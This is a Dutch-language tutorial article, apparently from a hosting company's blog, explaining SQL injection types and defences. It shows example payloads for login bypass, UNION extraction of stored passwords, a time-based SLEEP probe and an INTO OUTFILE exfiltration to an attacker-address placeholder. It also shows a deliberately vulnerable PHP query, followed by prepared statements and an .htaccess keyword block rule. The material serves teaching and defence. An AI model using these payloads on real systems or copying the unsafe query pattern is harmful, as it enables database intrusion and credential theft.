Wat is een SQL injectie?<\/h2>\n
SQL (Structured Query Language) is een taal waarmee we kunnen communiceren met databases<\/a>. Moderne webapplicaties gebruiken databases om gegevens te beheren en dynamische inhoud weer te geven aan lezers.<\/p>\n Er is sprake van SQL injectie (of SQLi) wanneer een gebruiker kwaadaardige SQL statements probeert in te voegen in een webapplicatie. Als dat lukt, krijgen ze toegang tot gevoelige gegevens in de database.<\/p>\n In 2023 behoren SQL injecties nog steeds tot de meest voorkomende aanvallen op het web. Alleen al in 2022 werden 1162 SQL injectiekwetsbaarheden<\/a> toegevoegd aan de CVE beveiligingsdatabase.<\/p>\n Het goede nieuws is dat SQL injecties niet meer zo vaak voorkomen als vroeger. De meeste applicaties zijn ge\u00ebvolueerd om zich te beschermen tegen SQL aanvallen.<\/p>\n In 2012 was 97 procent van alle datalekken<\/a> te wijten aan SQL injecties. Tegenwoordig is dat aantal nog steeds hoog, maar veel beter beheersbaar.<\/p>\n Een SQL injectie kwetsbaarheid geeft een aanvaller volledige toegang tot de database van je applicatie door het gebruik van kwaadaardige SQL statements.<\/p>\n Laten we eens kijken naar een voorbeeld van een kwetsbare applicatie.<\/p>\n Stel je de workflow voor van een typische webapplicatie waarbij databaseverzoeken worden gedaan via gebruikersinvoer. Je neemt de gebruikersinvoer door middel van een formulier, bijvoorbeeld een inlogformulier. Je bevraagt volgens je database met de velden die de gebruiker heeft ingevuld om hem te verifi\u00ebren. De structuur van de query naar je database ziet er ongeveer zo uit:<\/p>\n Laten we er voor het gemak van uitgaan dat je je wachtwoorden als platte tekst opslaat. Het is echter een goede gewoonte om je wachtwoorden te salten<\/a> en vervolgens te hashen. Als je de gebruikersnaam en het wachtwoord van het formulier hebt ontvangen, kun je de query als volgt in PHP defini\u00ebren:<\/p>\n Als iemand de waarde ‘admin’;–‘ invoert in het veld gebruikersnaam, zal de resulterende SQL query die de variabele $db_query genereert als volgt zijn:<\/p>\n Wat doet deze query?<\/p>\n In SQL begint het — symbool een comment, dus alles wat er na komt wordt genegeerd. Dit verwijdert de wachtwoordcontrole uit de query. Het resultaat is dat als “admin” een geldige gebruikersnaam is, de aanvaller kan inloggen zonder het wachtwoord te kennen. Tenminste, als er geen beveiliging is tegen dit soort aanvallen.<\/p>\n Als alternatief kan in dit voorbeeld ook een booleaanse aanval worden gebruikt om toegang te krijgen. Als een aanvaller “password’ of 1=1;-” invoert in het wachtwoordveld, zou de resulterende query er als volgt uitzien:<\/p>\n In dit geval zou je, zelfs als je wachtwoord fout is, worden geverifieerd in de applicatie. Als je webpagina de resultaten van de database query weergeeft, kan een aanvaller het commando gebruiken om tabellen weer te geven, het commando om de tabellen in de database weer te geven en vervolgens selectief tabellen droppen als hij dat wil.<\/p>\n Exploits of a Mom, een populair stripverhaal van XKCD, toont het gesprek van een moeder met de school van haar zoon, waarin haar wordt gevraagd of ze haar zoon echt “Robert’); DROP TABLE Students; -” heeft genoemd.<\/figure>\n Nu je de basis van een SQL injectie kwetsbaarheid kent, laten we de verschillende soorten SQL injectie-aanvallen en de reden achter elk van hen verkennen.<\/p>\n In-Band SQL injectie is de eenvoudigste vorm van SQL injectie. Hierbij kan de aanvaller hetzelfde kanaal gebruiken om de kwaadaardige SQL code in de applicatie in te voegen en de resultaten te verzamelen.<\/p>\n Laten we eens kijken naar twee vormen van in-band SQL injectie-aanvallen.<\/p>\n Een op fouten gebaseerde aanval vindt plaats wanneer iemand opzettelijk de SQL query manipuleert om een databasefout te genereren. De foutmelding die de database teruggeeft bevat vaak informatie over de databasestructuur, die de aanvaller kan gebruiken om het systeem verder uit te buiten.<\/p>\n Een aanvaller kan bijvoorbeeld ‘ OR ‘1’=’1 invoeren in een formulierveld. Als de applicatie kwetsbaar is, kan deze een foutmelding teruggeven die informatie over de database onthult.<\/p>\n Op union gebaseerde SQL injectie-aanvallen gebruiken de SQL UNION operator om de resultaten van de oorspronkelijke query te combineren met resultaten van ge\u00efnjecteerde kwaadaardige query’s.<\/p>\n Hierdoor kan de aanvaller informatie ophalen uit andere tabellen in de database:<\/p>\n In deze query combineert de UNION operator de resultaten van de oorspronkelijke query met de resultaten van SELECT username<\/em>, password<\/em> FROM user_table<\/em>. Als de applicatie kwetsbaar is en de gebruikersinvoer niet goed zuivert, kan deze een pagina terugsturen die gebruikersnamen en wachtwoorden uit de gebruikerstabel bevat.<\/p>\n Zelfs als een aanvaller een fout genereert in de SQL query, is het mogelijk dat het antwoord van de query niet direct naar de webpagina wordt gestuurd. In dit geval moet de aanvaller verder onderzoek doen.<\/p>\n Bij deze vorm van SQL injectie stuurt de aanvaller verschillende query’s naar de database om te beoordelen hoe de applicatie deze responses analyseert. Een inferenti\u00eble SQL injectie wordt ook wel blinde SQL injectie genoemd.<\/p>\n We zullen hieronder twee soorten inferenti\u00eble SQL injecties bekijken: booleaanse SQL injectie en tijdsgebaseerde SQL injectie.<\/p>\n Als een SQL query resulteert in een fout die niet intern in de applicatie is afgehandeld, kan de resulterende webpagina een foutmelding geven, een lege pagina laden of gedeeltelijk laden. Bij een booleaanse SQL injectie beoordeelt een aanvaller welke delen van de invoer van een gebruiker kwetsbaar zijn voor SQL injecties door twee verschillende versies van een booleaanse clausule door de invoer te proberen:<\/p>\n Deze query’s zijn ontworpen om een voorwaarde te hebben die waar of onwaar is. Als de voorwaarde waar is, wordt de pagina normaal geladen. Als de voorwaarde onwaar is, kan de pagina anders laden of een fout weergeven.<\/p>\n Door te kijken hoe de pagina laadt, kan de aanvaller bepalen of de voorwaarde waar of onwaar was, ook al zien ze de daadwerkelijke SQL query of het antwoord van de database niet. Als je meerdere vergelijkbare condities samenstelt, kun je langzaam informatie uit de database halen.<\/p>\n Een op tijd gebaseerde SQL injectie-aanval kan een aanvaller helpen bepalen of er een kwetsbaarheid aanwezig is<\/a> in een webapplicatie. Een aanvaller maakt gebruik van een vooraf gedefinieerde op tijd gebaseerde functie van het databasebeheersysteem dat wordt gebruikt door de applicatie. In MySQL<\/a> bijvoorbeeld geeft de sleep()<\/em> functie<\/a> de database de opdracht om een bepaald aantal seconden te wachten.<\/p>\n Als zo’n query resulteert in een vertraging, dan weet de aanvaller dat hij kwetsbaar is. Deze aanpak is vergelijkbaar met booleaanse aanvallen in die zin dat je geen daadwerkelijke respons krijgt van de database. Je kunt er echter wel informatie uit halen als de aanval slaagt.<\/p>\n Bij een out-of-band SQL Injectie aanval manipuleert de aanvaller de SQL query om de database opdracht te geven gegevens te verzenden naar een server die door de aanvaller wordt bestuurd. Dit wordt meestal bereikt door gebruik te maken van databasefuncties die externe resources kunnen opvragen, zoals HTTP verzoeken of DNS verzoeken.<\/p>\n Een out-of-band SQL injectie aanval maakt gebruik van een externe bestandsprocesmogelijkheid van je DBMS. In MySQL kunnen de LOAD_FILE() en INTO OUTFILE functies worden gebruikt om MySQL te verzoeken de gegevens naar een externe bron te sturen.<\/p>\n Hier wordt uitgelegd hoe een aanvaller OUTFILE zou kunnen gebruiken om de resultaten van een query naar een externe bron te sturen:<\/p>\n Op dezelfde manier kan de LOAD_FILE() functie worden gebruikt om een bestand van de server te lezen en de inhoud weer te geven. Een combinatie van LOAD_FILE() en OUTFILE kan worden gebruikt om de inhoud van een bestand op de server te lezen en vervolgens naar een andere locatie te sturen.<\/p>\n Tot nu toe hebben we de kwetsbaarheden in een webapplicatie onderzocht die kunnen leiden tot SQL injectie-aanvallen. Een kwetsbaarheid rond SQL injecties kan door een aanvaller worden gebruikt om de inhoud van je database te lezen, te wijzigen of zelfs te verwijderen.<\/p>\n Daarnaast kan het ook leiden tot het lezen van een bestand op een willekeurige locatie binnen de server en de inhoud naar elders overbrengen. In dit gedeelte verkennen we verschillende technieken om je webapplicatie en website te beschermen tegen SQL injectie-aanvallen.<\/p>\n Over het algemeen is het moeilijk om te bepalen of een user string kwaadaardig is of niet. Daarom is het escapen van speciale tekens in gebruikersinvoer een veelgebruikte aanpak. Dit proces kan helpen beschermen tegen SQL injectie-aanvallen.<\/p>\n In PHP kun je een string laten escapen voordat je de query opbouwt met de functie Bij het weergeven van gebruikersinvoer als HTML is het ook belangrijk om speciale tekens te converteren naar hun overeenkomstige HTML tekens om Cross-Site Scripting (XSS) aanvallen te voorkomen. Je kunt speciale tekens in PHP converteren met de functie Je kunt ook prepared statements gebruiken om SQL injecties te voorkomen. Een prepared statement is een template van een SQL query, waarbij je in een later stadium parameters opgeeft om de query uit te voeren.<\/p>\n Hier is een voorbeeld van een prepared statement in PHP en MySQLi:<\/p>\n De volgende stap in het beperken van deze kwetsbaarheid is het beperken van de toegang tot de database tot alleen het noodzakelijke.<\/p>\n Je kunt bijvoorbeeld je webapplicatie verbinden met de DBMS door een specifieke gebruiker te gebruiken die alleen toegang heeft tot de relevante database.<\/p>\n Daarnaast wil je de toegang van de databasegebruiker tot alle andere locaties van de server beperken. Het kan ook zijn dat je bepaalde SQL sleutelwoorden in je URL via je webserver wilt blokkeren.<\/p>\n Als je Apache<\/a> als webserver gebruikt, kun je de volgende regels code gebruiken in je .htaccess<\/a><\/em> bestand<\/a> om een 403 Forbidden<\/em> foutmelding<\/a> te tonen aan een potenti\u00eble aanvaller.<\/p>\n Je moet voorzichtig zijn voordat je deze techniek gebruikt, want Apache zal een fout weergeven aan een lezer als de URL deze trefwoorden bevat.<\/p>\nHoe werken kwetsbaarheden rond SQL injecties?<\/h2>\n
select * from user_table\nwhere username = 'sdaityari'\nand password = 'mypassword';<\/code><\/pre>\n\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query<\/code><\/pre>\nselect * from user_table where\nusername = 'admin';--' and password = 'mypassword'<\/code><\/pre>\nselect * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';<\/code><\/pre>\n![\"Een](\"https:\/\/kinsta.com\/wp-content\/uploads\/2023\/09\/sql-injection-cartoon.png\")
Soorten SQL injectie<\/h2>\n
In-Band SQL injectie<\/h3>\n
Aanval op basis van fouten<\/h4>\n
Aanval op basis van union<\/h4>\n
select title, link from post_table\nwhere id < 10\nunion\nselect username, password\nfrom user_table; --;<\/code><\/pre>\nInferenti\u00eble SQL injectie (blinde SQL injectie)<\/h2>\n
Booleaanse aanval<\/h4>\n
\n
Aanval op basis van tijd<\/h4>\n
select * from comments\nWHERE post_id=1-SLEEP(15);<\/code><\/pre>\nOut-of-band SQL injectie<\/h2>\n
select * from post_table\ninto OUTFILE '\\\\MALICIOUS_IP_ADDRESSlocation'<\/code><\/pre>\nZo voorkom je SQL injecties<\/h2>\n
Gebruikersinvoer omzeilen<\/h3>\n
mysqli_real_escape_string()<\/code>:<\/p>\n$unsafe_variable = $_POST[\"user_input\"]; $safe_variable = mysqli_real_escape_string($conn, $unsafe_variable);<\/code><\/pre>\nhtmlspecialchars()<\/code>.<\/p>\nGebruik prepared statements<\/h3>\n
$query = $mysql_connection->prepare(\"select * from user_table where username = ? and password = ?\");\n$query->execute(array($username, $password));<\/code><\/pre>\nAndere hygiene checks om SQL aanvallen te voorkomen<\/h3>\n
RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n